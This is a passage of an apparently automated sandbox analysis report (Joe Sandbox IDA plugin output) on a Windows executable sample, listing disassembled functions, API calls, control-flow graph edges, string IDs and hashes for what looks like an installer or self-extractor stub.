GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->97 95->94 106->58 112 7ff6373ae63a 106->112 107->52 112->52
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                          • API String ID: 1496594111-2013832382
                                                                                          • Opcode ID: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                          • Instruction ID: c0ade03df19b0f44be4053edf91b2fe33f1562847597c5961f97c1d484a25454
                                                                                          • Opcode Fuzzy Hash: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                          • Instruction Fuzzy Hash: 80321B31A0DB8299FB619F60E8411E933A8FF44354F500236DA8D977A9EF3CE659E344
                                                                                          Function 00007FF6373A98DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373A8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6373A8F8D
                                                                                          • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6373A9F75
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6373AA42F
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6373AA435
                                                                                            • Part of subcall function 00007FF6373B0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6373B0B44), ref: 00007FF6373B0BE9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                          • API String ID: 3629253777-3268106645
                                                                                          • Opcode ID: bd6ca6df72a9de109cab29b81db34f89513464c1785e7f9e7d7771b39afdabc3
                                                                                          • Instruction ID: c3336a98bfaf9d09491ab4a932552af9f5b8bbc246f48c16100376de0a68566a
                                                                                          • Opcode Fuzzy Hash: bd6ca6df72a9de109cab29b81db34f89513464c1785e7f9e7d7771b39afdabc3
                                                                                          • Instruction Fuzzy Hash: 6562DD22E1DA9695FF90DB24D48A2BD23A5FB40788F804132DA4E977D5EF3DE544E340
                                                                                          Function 00007FF6373C1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1910 7ff6373c1900-7ff6373c1989 call 7ff6373c1558 1913 7ff6373c19b4-7ff6373c19d1 1910->1913 1914 7ff6373c198b-7ff6373c19af call 7ff6373c1868 RaiseException 1910->1914 1916 7ff6373c19d3-7ff6373c19e4 1913->1916 1917 7ff6373c19e6-7ff6373c19ea 1913->1917 1920 7ff6373c1bb8-7ff6373c1bd5 1914->1920 1919 7ff6373c19ed-7ff6373c19f9 1916->1919 1917->1919 1921 7ff6373c19fb-7ff6373c1a0d 1919->1921 1922 7ff6373c1a1a-7ff6373c1a1d 1919->1922 1934 7ff6373c1a13 1921->1934 1935 7ff6373c1b89-7ff6373c1b93 1921->1935 1923 7ff6373c1ac4-7ff6373c1acb 1922->1923 1924 7ff6373c1a23-7ff6373c1a26 1922->1924 1928 7ff6373c1adf-7ff6373c1ae2 1923->1928 1929 7ff6373c1acd-7ff6373c1adc 1923->1929 1925 7ff6373c1a28-7ff6373c1a3b 1924->1925 1926 7ff6373c1a3d-7ff6373c1a52 LoadLibraryExA 1924->1926 1925->1926 1933 7ff6373c1aa9-7ff6373c1ab2 1925->1933 1932 7ff6373c1a54-7ff6373c1a67 GetLastError 1926->1932 1926->1933 1930 7ff6373c1b85 1928->1930 1931 7ff6373c1ae8-7ff6373c1aec 1928->1931 1929->1928 1930->1935 1938 7ff6373c1aee-7ff6373c1af2 1931->1938 1939 7ff6373c1b1b-7ff6373c1b2e GetProcAddress 1931->1939 1940 7ff6373c1a7e-7ff6373c1aa4 call 7ff6373c1868 RaiseException 1932->1940 1941 7ff6373c1a69-7ff6373c1a7c 1932->1941 1944 7ff6373c1ab4-7ff6373c1ab7 FreeLibrary 1933->1944 1945 7ff6373c1abd 1933->1945 1934->1922 1942 7ff6373c1bb0 call 7ff6373c1868 1935->1942 1943 7ff6373c1b95-7ff6373c1ba6 1935->1943 1938->1939 1946 7ff6373c1af4-7ff6373c1aff 1938->1946 1939->1930 1949 7ff6373c1b30-7ff6373c1b43 GetLastError 1939->1949 1940->1920 1941->1933 1941->1940 1952 7ff6373c1bb5 1942->1952 1943->1942 1944->1945 1945->1923 1946->1939 1950 7ff6373c1b01-7ff6373c1b08 1946->1950 1954 7ff6373c1b45-7ff6373c1b58 1949->1954 1955 7ff6373c1b5a-7ff6373c1b81 call 7ff6373c1868 RaiseException call 7ff6373c1558 1949->1955 1950->1939 1956 7ff6373c1b0a-7ff6373c1b0f 1950->1956 1952->1920 1954->1930 1954->1955 1955->1930 1956->1939 1959 7ff6373c1b11-7ff6373c1b19 1956->1959 1959->1930 1959->1939
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                          • String ID: H
                                                                                          • API String ID: 3432403771-2852464175
                                                                                          • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                          • Instruction ID: 6d2755635c02d175eeba85057bdd3d9b91400e83016151c657677c44174b7eac
                                                                                          • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                          • Instruction Fuzzy Hash: 72914766E09B628AFB50CFA5D8406A833B1FF08B99F484539DE0D97754EF38E445E740
                                                                                          Function 00007FF6373BF4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1988 7ff6373bf4e0-7ff6373bf523 1989 7ff6373bf894-7ff6373bf8b9 call 7ff637391fa0 call 7ff6373c2320 1988->1989 1990 7ff6373bf529-7ff6373bf565 call 7ff6373c3cf0 1988->1990 1996 7ff6373bf567 1990->1996 1997 7ff6373bf56a-7ff6373bf571 1990->1997 1996->1997 1999 7ff6373bf573-7ff6373bf577 1997->1999 2000 7ff6373bf582-7ff6373bf586 1997->2000 2003 7ff6373bf579 1999->2003 2004 7ff6373bf57c-7ff6373bf580 1999->2004 2001 7ff6373bf588 2000->2001 2002 7ff6373bf58b-7ff6373bf596 2000->2002 2001->2002 2005 7ff6373bf628 2002->2005 2006 7ff6373bf59c 2002->2006 2003->2004 2004->2002 2008 7ff6373bf62c-7ff6373bf62f 2005->2008 2007 7ff6373bf5a2-7ff6373bf5a9 2006->2007 2009 7ff6373bf5ae-7ff6373bf5b3 2007->2009 2010 7ff6373bf5ab 2007->2010 2011 7ff6373bf631-7ff6373bf635 2008->2011 2012 7ff6373bf637-7ff6373bf63a 2008->2012 2013 7ff6373bf5e5-7ff6373bf5f0 2009->2013 2014 7ff6373bf5b5 2009->2014 2010->2009 2011->2012 2015 7ff6373bf660-7ff6373bf673 call 7ff6373a63ac 2011->2015 2012->2015 2016 7ff6373bf63c-7ff6373bf643 2012->2016 2017 7ff6373bf5f5-7ff6373bf5fa 2013->2017 2018 7ff6373bf5f2 2013->2018 2019 7ff6373bf5ca-7ff6373bf5d0 2014->2019 2033 7ff6373bf675-7ff6373bf693 call 7ff6373b13c4 2015->2033 2034 7ff6373bf698-7ff6373bf6ed call 7ff6373c797c call 7ff63739129c call 7ff6373a32a8 call 7ff637391fa0 2015->2034 2016->2015 2020 7ff6373bf645-7ff6373bf65c 2016->2020 2022 7ff6373bf600-7ff6373bf607 2017->2022 2023 7ff6373bf8ba-7ff6373bf8c1 2017->2023 2018->2017 2024 7ff6373bf5d2 2019->2024 2025 7ff6373bf5b7-7ff6373bf5be 2019->2025 2020->2015 2027 7ff6373bf609 2022->2027 2028 7ff6373bf60c-7ff6373bf612 2022->2028 2031 7ff6373bf8c3 2023->2031 2032 7ff6373bf8c6-7ff6373bf8cb 2023->2032 2024->2013 2029 7ff6373bf5c0 2025->2029 2030 7ff6373bf5c3-7ff6373bf5c8 2025->2030 2027->2028 2028->2023 2037 7ff6373bf618-7ff6373bf622 2028->2037 2029->2030 2030->2019 2038 7ff6373bf5d4-7ff6373bf5db 2030->2038 2031->2032 2039 7ff6373bf8de-7ff6373bf8e6 2032->2039 2040 7ff6373bf8cd-7ff6373bf8d4 2032->2040 2033->2034 2055 7ff6373bf6ef-7ff6373bf73d call 7ff6373c797c call 7ff63739129c call 7ff6373a5b60 call 7ff637391fa0 2034->2055 2056 7ff6373bf742-7ff6373bf74f ShellExecuteExW 2034->2056 2037->2005 2037->2007 2045 7ff6373bf5e0 2038->2045 2046 7ff6373bf5dd 2038->2046 2042 7ff6373bf8e8 2039->2042 2043 7ff6373bf8eb-7ff6373bf8f6 2039->2043 2047 7ff6373bf8d9 2040->2047 2048 7ff6373bf8d6 2040->2048 2042->2043 2043->2008 2045->2013 2046->2045 2047->2039 2048->2047 2055->2056 2057 7ff6373bf755-7ff6373bf75f 2056->2057 2058 7ff6373bf846-7ff6373bf84e 2056->2058 2062 7ff6373bf761-7ff6373bf764 2057->2062 2063 7ff6373bf76f-7ff6373bf772 2057->2063 2060 7ff6373bf850-7ff6373bf866 2058->2060 2061 7ff6373bf882-7ff6373bf88f 2058->2061 2065 7ff6373bf868-7ff6373bf87b 2060->2065 2066 7ff6373bf87d call 7ff6373c220c 2060->2066 2061->1989 2062->2063 2067 7ff6373bf766-7ff6373bf76d 2062->2067 2068 7ff6373bf78e-7ff6373bf7ad call 7ff6373fe1b8 call 7ff6373bfe24 2063->2068 2069 7ff6373bf774-7ff6373bf77f call 7ff6373fe188 2063->2069 2065->2066 2071 7ff6373bf8fb-7ff6373bf903 call 7ff6373c7904 2065->2071 2066->2061 2067->2063 2073 7ff6373bf7e3-7ff6373bf7f0 CloseHandle 2067->2073 2068->2073 2095 7ff6373bf7af-7ff6373bf7b2 2068->2095 2069->2068 2089 7ff6373bf781-7ff6373bf78c ShowWindow 2069->2089 2079 7ff6373bf805-7ff6373bf80c 2073->2079 2080 7ff6373bf7f2-7ff6373bf803 call 7ff6373b13c4 2073->2080 2087 7ff6373bf82e-7ff6373bf830 2079->2087 2088 7ff6373bf80e-7ff6373bf811 2079->2088 2080->2079 2080->2087 2087->2058 2094 7ff6373bf832-7ff6373bf835 2087->2094 2088->2087 2093 7ff6373bf813-7ff6373bf828 2088->2093 2089->2068 2093->2087 2094->2058 2097 7ff6373bf837-7ff6373bf845 ShowWindow 2094->2097 2095->2073 2098 7ff6373bf7b4-7ff6373bf7c5 GetExitCodeProcess 2095->2098 2097->2058 2098->2073 2099 7ff6373bf7c7-7ff6373bf7dc 2098->2099 2099->2073
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: .exe$.inf$Install$p
                                                                                          • API String ID: 1054546013-3607691742
                                                                                          • Opcode ID: c6f76f6c8fcdec6a9ec59f0dbfd30d3a1227c2325c044532a7440e198af86fad
                                                                                          • Instruction ID: f28f88b60a48ce1b7b70d1b59a12ea29183670c47914397fac5a87a170091e56
                                                                                          • Opcode Fuzzy Hash: c6f76f6c8fcdec6a9ec59f0dbfd30d3a1227c2325c044532a7440e198af86fad
                                                                                          • Instruction Fuzzy Hash: 6CC16C62F1CA0295FA10CBA5D9802B923B1EF89B84F446036DE4DD7BA5EF3CF555A304
                                                                                          Function 00007FF6373BF0A4 Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3569833718-0
                                                                                          • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                          • Instruction ID: 18cb29c33fc7ebbe5ed1afc4a247f65d563e7840cfac58678df562793be34d57
                                                                                          • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                          • Instruction Fuzzy Hash: 3441B135F18A4286F700DF61E814BAA37A0EB89FD8F841136DD0A87B95CF3EE4459744
                                                                                          Function 00007FF63739EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: 476280e4e4996ebed44920e940aa60cbe762a3d7da97a2a52b720d7dfe20026c
                                                                                          • Instruction ID: 9a19295e826d994d67e8b6262004bfe006d9925a0d13f04369e6563a909b25b2
                                                                                          • Opcode Fuzzy Hash: 476280e4e4996ebed44920e940aa60cbe762a3d7da97a2a52b720d7dfe20026c
                                                                                          • Instruction Fuzzy Hash: 0F12CD62F0CB4285FB10DB65D4442AD2372EB967A8F400236DA5D97BE9DF3CE58AD340
                                                                                          Function 00007FF6373A24C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3818 7ff6373a24c0-7ff6373a24fb 3819 7ff6373a2506 3818->3819 3820 7ff6373a24fd-7ff6373a2504 3818->3820 3821 7ff6373a2509-7ff6373a2578 3819->3821 3820->3819 3820->3821 3822 7ff6373a257a 3821->3822 3823 7ff6373a257d-7ff6373a25a8 CreateFileW 3821->3823 3822->3823 3824 7ff6373a25ae-7ff6373a25de GetLastError call 7ff6373a6a0c 3823->3824 3825 7ff6373a2688-7ff6373a268d 3823->3825 3834 7ff6373a25e0-7ff6373a262a CreateFileW GetLastError 3824->3834 3835 7ff6373a262c 3824->3835 3826 7ff6373a2693-7ff6373a2697 3825->3826 3828 7ff6373a26a5-7ff6373a26a9 3826->3828 3829 7ff6373a2699-7ff6373a269c 3826->3829 3832 7ff6373a26cf-7ff6373a26e3 3828->3832 3833 7ff6373a26ab-7ff6373a26af 3828->3833 3829->3828 3831 7ff6373a269e 3829->3831 3831->3828 3837 7ff6373a26e5-7ff6373a26f0 3832->3837 3838 7ff6373a270c-7ff6373a2735 call 7ff6373c2320 3832->3838 3833->3832 3836 7ff6373a26b1-7ff6373a26c9 SetFileTime 3833->3836 3839 7ff6373a2632-7ff6373a263a 3834->3839 3835->3839 3836->3832 3840 7ff6373a26f2-7ff6373a26fa 3837->3840 3841 7ff6373a2708 3837->3841 3842 7ff6373a2673-7ff6373a2686 3839->3842 3843 7ff6373a263c-7ff6373a2653 3839->3843 3846 7ff6373a26ff-7ff6373a2703 call 7ff6373920b0 3840->3846 3847 7ff6373a26fc 3840->3847 3841->3838 3842->3826 3848 7ff6373a266e call 7ff6373c220c 3843->3848 3849 7ff6373a2655-7ff6373a2668 3843->3849 3846->3841 3847->3846 3848->3842 3849->3848 3851 7ff6373a2736-7ff6373a273b call 7ff6373c7904 3849->3851
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3536497005-0
                                                                                          • Opcode ID: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                                                                                          • Instruction ID: ae9492d2850be5106dda29fc97444ac9920f9b24596549fa7abc5292379d4875
                                                                                          • Opcode Fuzzy Hash: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                                                                                          • Instruction Fuzzy Hash: 0661E262A1C68186FB608B29E40136E67B1FB857A8F101334DFAD43BE8CF7DD064A704
                                                                                          Function 00007FF6373BB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                          • String ID: ]
                                                                                          • API String ID: 3561356813-3352871620
                                                                                          • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                          • Instruction ID: a130fff0730b975161e7b93148833c795cfd542f75ca2c55205545bc1b6121b9
                                                                                          • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                          • Instruction Fuzzy Hash: 00119421F0DA4346FA649B22A6547B963D2EF88BC0F080034DD5D87B99DF3CF804AB41
                                                                                          Function 00007FF6373BAE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 1266772231-0
                                                                                          • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                          • Instruction ID: 47ec5f367f35791e210f09cd82990b3f8ae8458a1cd14b1b6590fd36d8e1a28a
                                                                                          • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                          • Instruction Fuzzy Hash: 22F0EC26A3DD5292FB609B65E895A7623A1FF90745F805431E54E81A54DF3CE508DB00
                                                                                          Function 00007FF6373B91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
